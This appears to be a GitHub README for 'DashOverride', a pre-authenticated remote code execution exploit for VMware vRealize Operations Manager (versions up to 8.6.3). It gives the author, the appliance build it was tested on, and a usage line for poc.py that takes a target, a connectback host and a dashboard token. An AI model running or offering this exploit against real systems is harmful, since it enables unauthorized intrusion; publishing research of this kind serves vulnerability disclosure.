/DashOverride

This is a pre-authenticated RCE exploit for VMware vRealize Operations Manager

Primary LanguagePythonMIT LicenseMIT

DashOverride

What

This is a pre-authenticated RCE exploit for VMware vRealize Operations Manager (vROPS) that impacts versions <= 8.6.3.19682901.

Author

Steven Seeley of Qihoo 360 Vulnerability Research Institute

Tested

The exploit was tested against 8.6.3.19682901 using the file vRealize-Operations-Manager-Appliance-8.6.3.19682901_OVF10.ova (SHA1: 4637b6385db4fbee6b1150605087197f8d03ba00) but it has known to work against other older versions as well.

Notes

Run

researcher@mars:~$ ./poc.py 
(+) usage: ./poc.py <target> <connectback> <dashboardlink_token>
(+) eg: ./poc.py 192.168.2.196 192.168.2.234 uuncuybis9

Example

Running DashOverride